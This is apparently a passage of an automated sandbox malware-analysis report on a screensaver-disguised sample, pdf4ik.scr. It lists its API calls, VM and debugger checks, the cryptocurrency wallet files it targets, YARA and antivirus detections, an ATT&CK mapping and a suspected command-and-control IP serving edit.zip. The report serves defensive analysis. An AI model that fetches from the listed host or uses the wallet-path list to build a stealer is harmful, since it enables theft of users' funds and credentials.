                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D8FA90 CoCreateInstance,MultiByteToWideChar,lstrcpyn,12_2_29D8FA90
                  Source: C:\Windows\System32\OpenWith.exe File read: C:\Users\desktop.ini
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DA3B10 CreateToolhelp32Snapshot,Process32First,Process32Next,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,Process32Next,CloseHandle,12_2_29DA3B10
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6916
                  Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_02
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: pdf_novichki.rarStatic file information: File size 6238622 > 1048576
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DB5A95 push ecx; ret 12_2_29DB5AA8
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DB07BE push ecx; ret 12_2_29DB07D1
                  Source: pdf4ik.scr.9.drStatic PE information: section name: .eh_fram
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA8390 GetProcAddress (repeated), LoadLibraryA (repeated), GetProcAddress (repeated), 12_2_29DA8390

                  Persistence and Installation Behavior

                  Source: C:\Program Files\7-Zip\7zG.exe File created: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr
                  Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: _memset,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,SHGetFolderPathA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetUserNameA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,StrStrA,lstrcpyn,wsprintfA,lstrcpy,lstrlenA,12_2_29D90880
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrAPI coverage: 7.9 %
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DA2E90 GetSystemInfo,12_2_29DA2E90
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D9B960 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,12_2_29D9B960
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D93B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,12_2_29D93B60
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DA4C40 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_29DA4C40
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D9CE80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,12_2_29D9CE80
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D96160 _memset,_memset,SHGetFolderPathA,lstrcatA,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,GetFileAttributesA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,12_2_29D96160
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D90130 wsprintfA,FindFirstFileA,_memset,lstrcatA,StrCmpCA,StrCmpCA,lstrcpy,lstrcatA,lstrcatA,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcatA,PathFindFileNameA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcatA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcatA,PathFindFileNameA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcatA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,12_2_29D90130
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D9E060 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose,12_2_29D9E060
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D8F3E0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcatA,lstrlenA,12_2_29D8F3E0
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D9B520 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,_memset,_memset,FindNextFileA,FindClose,12_2_29D9B520
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D964B0 _memset,SHGetFolderPathA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,SHGetFolderPathA,wsprintfA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,12_2_29D964B0
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D9E470 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,12_2_29D9E470
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D90880 _memset,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,SHGetFolderPathA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetUserNameA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,StrStrA,lstrcpyn,wsprintfA,lstrcpy,lstrlenA,12_2_29D90880
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrAPI call chain: ExitProcess graph end nodegraph_12-26339
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrAPI call chain: ExitProcess graph end nodegraph_12-26421
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrAPI call chain: ExitProcess graph end nodegraph_12-26402
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrAPI call chain: ExitProcess graph end nodegraph_12-26358
                  Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE File Volume queried: C:\Windows\System32 FullSizeInformation
                  Source: pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: )GetProcessWindowStationGetUserObjectInformationWGetLastActivePopupGetActiveWindowMessageBoxWUSER32.DLLCONOUT$DISPLAYVMwareVMware237GIWzr{~
                  Source: pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2416733096.00000000015F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW&
                  Source: pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }DGetProcessWindowStationGetUserObjectInformationWGetLastActivePopupGetActiveWindowMessageBoxWUSER32.DLLCONOUT$DISPLAYVMwareVMware237GIWzr{~
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DB387C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_29DB387C
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DA2920 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,HeapAlloc,std::_Xinvalid_argument,_memmove,wsprintfA,_memmove,_memmove,12_2_29DA2920
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Process queried: DebugPort
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DADF46 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_29DADF46
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DB77BA SetUnhandledExceptionFilter,12_2_29DB77BA
                  Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                  Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                  Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                  Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WerFault.exe Queries volume information: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_pdf4ik.scr_d3ed75eaedbf1e5597eeca0ea8836d4192ee030_201b8dc8_79653cc3-7dca-4c64-8ba1-b09584582b02\Report.wer VolumeInformation
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,12_2_29DB99E8
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,12_2_29DB9981
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,12_2_29DB98C1
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,12_2_29DB1B1C
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: GetLocaleInfoA,wsprintfA,_memset,LocalFree,12_2_29DA3A68
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree,12_2_29DA3A00
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,12_2_29DB9A24
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,12_2_29DB8DD9
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: GetLocaleInfoA,12_2_29DB2DBB
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,12_2_29DB7E20
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,12_2_29DB817D
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,12_2_29DB90C7
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,12_2_29DB95EE
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,12_2_29DBD57F
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_29DB94F9
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,12_2_29DB96F0
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,12_2_29DB9695
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,12_2_29DBD659
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D81190 cpuid 12_2_29D81190
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA3900 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,12_2_29DA3900
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D90880 _memset,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,SHGetFolderPathA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetUserNameA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,StrStrA,lstrcpyn,wsprintfA,lstrcpy,lstrlenA,12_2_29D90880

                  Stealing of Sensitive Information

                  Source: Yara match File source: 12.2.pdf4ik.scr.29d80000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 12.2.pdf4ik.scr.29d80000.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 12.2.pdf4ik.scr.29adb058.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: pdf4ik.scr PID: 6916, type: MEMORYSTR
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectronCash
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx_Desktop_Old
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
                  Source: pdf4ik.scr String found in binary or memory: \Exodus\backups
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \jaxx\Local Storage\
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Ethereum"
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default_wallet
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: file__0.localstorage
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \MultiDoge\
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
                  Source: Yara match File source: 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: pdf4ik.scr PID: 6916, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match File source: 12.2.pdf4ik.scr.29d80000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 12.2.pdf4ik.scr.29d80000.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 12.2.pdf4ik.scr.29adb058.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: pdf4ik.scr PID: 6916, type: MEMORYSTR

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Process Injection | 11 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Screen Capture | Exfiltration Over Other Network Medium | 21 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 131 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 3 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Process Injection | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 114 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 DLL Side-Loading | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 3 File and Directory Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 35 System Information Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| pdf_novichki.rar | 0% | Virustotal | | Browse |

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr | 100% | Avira | WORM/Lodbak.Gen2 | |

No Antivirus matches
No Antivirus matches

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| http://116.203.13.130/edit.zipcac5b60b5e28992247664-7ff3f708-074b-4ff4-b2c5-87e7-806e6f6e6963 | 0% | Avira URL Cloud | safe | |
| http://116.203.13.130/edit.zipvqD | 0% | Avira URL Cloud | safe | |
| http://116.203.13.130/edit.zip:D | 0% | Avira URL Cloud | safe | |
| http://116.203.13.130 | 0% | Avira URL Cloud | safe | |
| http://116.203.13.130 | 1% | Virustotal | | Browse |
| http://116.203.13.130/ | 1% | Virustotal | | Browse |
| http://116.203.13.130/ | 0% | Avira URL Cloud | safe | |
| http://116.203.13.130/oI | 0% | Avira URL Cloud | safe | |
| http://116.203.13.130/edit.zipx | 0% | Avira URL Cloud | safe | |
| http://116.203.13.130/edit.zip | 0% | Avira URL Cloud | safe | |
| http://116.203.13.130/edit.zip9 | 0% | Avira URL Cloud | safe | |
